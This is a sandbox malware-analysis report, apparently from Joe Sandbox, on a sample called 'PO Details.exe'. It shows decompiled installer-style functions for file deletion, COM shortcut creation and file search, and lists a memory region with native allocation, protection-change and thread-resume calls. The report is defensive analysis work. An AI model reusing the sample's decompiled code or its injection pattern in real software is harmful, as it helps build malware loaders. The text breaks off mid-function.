Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 244c21c8e9e2d290a03824d05727fb7852761bcf3a738faa395f8c5411a7848e
Instruction ID: 3aeb1d7ac393bb62e66f100886c8e91d8818685de2e4fce446a09ea212575fc6
Opcode Fuzzy Hash: 244c21c8e9e2d290a03824d05727fb7852761bcf3a738faa395f8c5411a7848e
Instruction Fuzzy Hash: 66229C71D5460ADEDB508FF9D480AEDBBB8FB05305F12462FD1A6B3380D7B06989AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405B23 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405B23(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405DEE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434fa8 =  *0x434fa8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406411(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405D32(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406411(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405ADB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405479(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434fa8 =  *0x434fa8 + 1;
										} else {
											E00405479(0xfffffff1, _t68);
											E004061D7(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405B23(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040676F(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405CE6(_t68);
							_t38 = E00405ADB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405479(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405479(0xfffffff1, _t68);
							return E004061D7(_t67, _t68, 0);
						}
						L30:
						 *0x434fa8 =  *0x434fa8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405b2d
0x00405b32
0x00405b3b
0x00405b3e
0x00405b46
0x00405b49
0x00405b4c
0x00405b54
0x00405b56
0x00405b57
0x00000000
0x00405b57
0x00405b62
0x00405b65
0x00405b65
0x00405b65
0x00405b69
0x00405b7c
0x00405b83
0x00405b88
0x00405b8c
0x00405b9c
0x00405b8e
0x00405b94
0x00405b94
0x00405ba1
0x00405ba5
0x00405bb1
0x00405bb7
0x00405bbc
0x00405bc2
0x00405bcd
0x00405bd3
0x00405bd5
0x00405bd8
0x00405c82
0x00405c82
0x00405c86
0x00405c88
0x00405c88
0x00405c88
0x00405c88
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bde
0x00405bde
0x00405bde
0x00405be6
0x00405c06
0x00405c0e
0x00405c13
0x00405c1a
0x00405c35
0x00405c3a
0x00405c3c
0x00405c60
0x00405c3e
0x00405c3e
0x00405c41
0x00405c55
0x00405c43
0x00405c46
0x00405c4e
0x00405c4e
0x00405c41
0x00405c1c
0x00405c22
0x00405c24
0x00405c2a
0x00405c2a
0x00405c24
0x00000000
0x00405c1a
0x00405be8
0x00405bf0
0x00000000
0x00000000
0x00405bf2
0x00405bfa
0x00000000
0x00000000
0x00405bfc
0x00405c04
0x00000000
0x00000000
0x00000000
0x00405c65
0x00405c6d
0x00405c73
0x00405c73
0x00405c7c
0x00000000
0x00405c7c
0x00405ba7
0x00405baf
0x00000000
0x00000000
0x00000000
0x00405b6b
0x00405b6b
0x00405b6d
0x00405c8d
0x00405c8f
0x00405c92
0x00405ce3
0x00405ce3
0x00405ce3
0x00405c94
0x00405c97
0x00405ca2
0x00405ca7
0x00405ca9
0x00000000
0x00000000
0x00405cac
0x00405cb8
0x00405cbd
0x00405cbf
0x00000000
0x00405cda
0x00405cc1
0x00405cc4
0x00000000
0x00000000
0x00405cc9
0x00000000
0x00405cd0
0x00405c99
0x00405c99
0x00000000
0x00405c99
0x00405b73
0x00405b76
0x00000000
0x00000000
0x00000000
0x00405b76

APIs

DeleteFileW.KERNELBASE(?,?,76693420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B4C
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405B94
lstrcatW.KERNEL32(?,0040A014), ref: 00405BB7
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76693420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BBD
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76693420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BCD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C6D
FindClose.KERNEL32(00000000), ref: 00405C7C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
\*.*, xrefs: 00405B8E
"C:\Users\user\Desktop\PO Details.exe" , xrefs: 00405B23

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PO Details.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1610535744
Opcode ID: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
Instruction ID: 64ad53015563eb9bad7c636b6f780160dd5a6986b89d0419f795064a900c36f2
Opcode Fuzzy Hash: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
Instruction Fuzzy Hash: 8941B330804B18AAEB21AB658D89AAF7778EF41714F24417FF802B11D1D77C5E81DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 02A8640D Relevance: 4.2, Strings: 3, Instructions: 419COMMON

Download Yara Rule

Strings

(@F, xrefs: 02A8661D
q6?, xrefs: 02A8666A
B, xrefs: 02A86468

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: (@F$B$q6?
API String ID: 0-4228367602
Opcode ID: 48abca6bf789c3d28fb22173824d639842acb0830494d7cbd48a8a4cbec68961
Instruction ID: c84d7a76e97af5f1ede71e64f0882d47d36a9a5fdc014da4b22e355260577b86
Opcode Fuzzy Hash: 48abca6bf789c3d28fb22173824d639842acb0830494d7cbd48a8a4cbec68961
Instruction Fuzzy Hash: 56F177706443898FEB35DF29CD947DA7BF6AF95390F94812ECC898B241DB309A46CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02A86E59 Relevance: 4.1, Strings: 3, Instructions: 340COMMON

Download Yara Rule

Strings

B, xrefs: 02A8FB64
B, xrefs: 02A8F76C
B, xrefs: 02A8F7D4

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: B$B$B
API String ID: 0-3513081065
Opcode ID: 7cc8111c89ff16eb8cf7fce34f66ad3561b0563353556343ea708d7628a7bdee
Instruction ID: 1078d1192f8bee1baf1ecfb2fb3b4a8a6b577296582b10acea971d0e02902c66
Opcode Fuzzy Hash: 7cc8111c89ff16eb8cf7fce34f66ad3561b0563353556343ea708d7628a7bdee
Instruction Fuzzy Hash: D5D126302453858FEB319F35CDA8BDE7BF55F42394F84815EDD889B542CB789A488B06

Uniqueness

Uniqueness Score: -1.00%

Function 02A91137 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-84CA012C,?,46A7C4BD), ref: 02A91337

Strings

0.Hu, xrefs: 02A91319

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 0.Hu
API String ID: 2167126740-4218621161
Opcode ID: 775533a66efd6c35889d8de6a8a460c511fa19b6b24aab406c545f258e941113
Instruction ID: 18427f7e9a88286abeac60a291f484f9cfcbf6d41282b0063534a83b689e8c22
Opcode Fuzzy Hash: 775533a66efd6c35889d8de6a8a460c511fa19b6b24aab406c545f258e941113
Instruction Fuzzy Hash: B6511176A0434ADFDF709E28D9943DE77F2EF5A3A4F860519DC89AB254C3704A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021A2(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402D3E(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402D3E(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402D3E(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402D3E(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402D3E(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405D5D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402D3E(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Bilfragmenteringsanlgs209\\Buskmndene\\Injectors\\Cunts");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021ab
0x004021b5
0x004021bf
0x004021c9
0x004021d4
0x004021d7
0x004021f1
0x004021f4
0x004021fa
0x004021fd
0x00402207
0x0040220b
0x0040220b
0x00402210
0x00402221
0x00402229
0x004022e0
0x004022e0
0x004022e7
0x0040222f
0x0040222f
0x0040223e
0x00402242
0x00402245
0x0040224b
0x00402259
0x0040225c
0x0040225e
0x00402269
0x00402269
0x0040226e
0x00402270
0x00402277
0x00402277
0x0040227a
0x00402283
0x00402286
0x0040228c
0x0040228e
0x00402298
0x00402298
0x0040229b
0x004022a4
0x004022a7
0x004022b0
0x004022b6
0x004022b8
0x004022c6
0x004022c6
0x004022c9
0x004022cf
0x004022cf
0x004022d2
0x004022d8
0x004022de
0x004022f3
0x00000000
0x00000000
0x00000000
0x004022de
0x004022e9
0x00402bc5
0x00402bd1

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221

Strings

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts, xrefs: 00402261

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts
API String ID: 542301482-3700850040
Opcode ID: 4373d2ccac3603b03551c12e12cc4eca9aa576ff9ac0ddff88ea01231626ecb5
Instruction ID: 552a380bc1a798379165a166047c46cc7e7689cdd056a509842d4882e8d45c12
Opcode Fuzzy Hash: 4373d2ccac3603b03551c12e12cc4eca9aa576ff9ac0ddff88ea01231626ecb5
Instruction Fuzzy Hash: 33410875A00208AFCF00DFE4C989A9E7BB6FF48314B20457AF515EB2D1DB799981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02A8F980 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 02A8FABF

Strings

<R[t, xrefs: 02A8F9AE

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: <R[t
API String ID: 823142352-4205204321
Opcode ID: 947ffd1e2be17a43600c3eba3c8e15a7caf2b46277c02796e3c728148eb29c45
Instruction ID: 9b191b2040f669e5a6a07537e8ca231c9b8d730a0b7e2a7a53e06c413c4c7665
Opcode Fuzzy Hash: 947ffd1e2be17a43600c3eba3c8e15a7caf2b46277c02796e3c728148eb29c45
Instruction Fuzzy Hash: E62104726083449FCB68AE38DD85BDE77B6EF55760F42491ED99AAB251C3700D81CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0040676F Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040676F(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}

0x0040677a
0x00406783
0x00000000
0x00406790
0x00406786
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,004302B8,0042FA70,00405E37,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4iv,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,76693420,C:\Users\user\AppData\Local\Temp\), ref: 0040677A
FindClose.KERNEL32(00000000), ref: 00406786

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: c6bcef3f8635fd9f58624a192a3d19c105278d067f6c5fe4f3eb3d2c281a06a9
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: F0D012315242206FC3805B386E0C84B7A989F16335B218B36B4AAF21E0D7349C3287BC

Uniqueness

Uniqueness Score: -1.00%

Function 02A8A0F1 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

\,q, xrefs: 02A8A453

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: \,q
API String ID: 0-1762625032
Opcode ID: fce90ec17ef8f017d85f7eee1a2859ef686e2c7190b5e44cdb390443afd12f37
Instruction ID: 9ae3de627f5d4c2d0b12be247f131ef2ecf13baf646847e5722002e3357e3170
Opcode Fuzzy Hash: fce90ec17ef8f017d85f7eee1a2859ef686e2c7190b5e44cdb390443afd12f37
Instruction Fuzzy Hash: CFE11F7564038A8FDF349F29CD957DA37B2BF99350F94812ECC898B605D7318A86CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A93737 Relevance: 1.5, APIs: 1, Instructions: 44nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(00000001,02A94046,B45B7260,00000000,?,?,?,?,02A9031F,02A832B9), ref: 02A9397D

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 75aa51ded529efda3dedd36590272cb4dfa874e50a37461f5017330e1814d8a8
Instruction ID: a9c8b85fd8f5923dea63df0f0f62714d3dc295ffec7b30e391d9c3c0c1b905aa
Opcode Fuzzy Hash: 75aa51ded529efda3dedd36590272cb4dfa874e50a37461f5017330e1814d8a8
Instruction Fuzzy Hash: D2014671604245CFCF28DE7A8AE83ED37F2AF89344F1081B9CD0A8B204CF329948CA50

Uniqueness

Uniqueness Score: -1.00%

Function 02A929CF Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(32E36E8B,?,?,?,?,02A91EC3), ref: 02A92A7E

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: cff5e095aa135ad83e066ecf8e7761febb5abd957f5a6dfc5e38ce33843f9360
Instruction ID: 171c550664e166c250516634c583574df93cf1619701455e4d10ee1f37963677
Opcode Fuzzy Hash: cff5e095aa135ad83e066ecf8e7761febb5abd957f5a6dfc5e38ce33843f9360
Instruction Fuzzy Hash: 49F031B07042859FEB34CE2DCD846EAB7E6EBC8304F40802DD95D87258C7309A45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02A8A6F9 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

^\, xrefs: 02A8AAB2

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID: ^\
API String ID: 0-642113447
Opcode ID: d7176eb8ed921d0f1a507463e5c242712068fd72728208c2d46dc84752771b4c
Instruction ID: ed6e63474d9a6789413581d815a9ef08cf1a37d71e2412ecaeccd042fd5eb771
Opcode Fuzzy Hash: d7176eb8ed921d0f1a507463e5c242712068fd72728208c2d46dc84752771b4c
Instruction Fuzzy Hash: 9981C1716043899FDB30AF2ACAD47EE77F6BF55790F95802DCC89CB600D7309A458A15

Uniqueness

Uniqueness Score: -1.00%

Function 02A87261 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c16fce7740e4d6013da70c55798950fda1bd5d2c09155a642a9d2cb1a2f064
Instruction ID: e0b4ebd6a6bfe2519b416d9b1b34db4bfbf61c2d903a0e227cf3e08cf2f6abf6
Opcode Fuzzy Hash: b3c16fce7740e4d6013da70c55798950fda1bd5d2c09155a642a9d2cb1a2f064
Instruction Fuzzy Hash: 9791FE7164138A8FCF30AE29CD947DE76F6BF99790F94412EDD898B240DB308A85CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02A939FA Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95dcefb568f995ee11a31d4b8c3889cf9e2503a4cae2906d3f675da2513e8f2
Instruction ID: 3015acacefbfb7fdeabaed25b4791e384a56004fae59071bf743927820d64aaa
Opcode Fuzzy Hash: c95dcefb568f995ee11a31d4b8c3889cf9e2503a4cae2906d3f675da2513e8f2
Instruction Fuzzy Hash: 8F51AF7164538A8BCF30AE2ACDA07EE77F2AF69750F94416ACD498B240DB305645CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02A900E0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f329b89f0e18e2c17c69c581d59cd70599aca2641d2ff9dd08d631df45899c8
Instruction ID: 0efc0943bcfc4b74396a0a0ec3afa6d3f5b0e568835e87f99130d5acab416de2
Opcode Fuzzy Hash: 7f329b89f0e18e2c17c69c581d59cd70599aca2641d2ff9dd08d631df45899c8
Instruction Fuzzy Hash: 11418E757453898BCB30AE2ACED07DE77F6BF99790F94812DCD8897240D7309A458B11

Uniqueness

Uniqueness Score: -1.00%

Function 00403E8E Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403E8E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
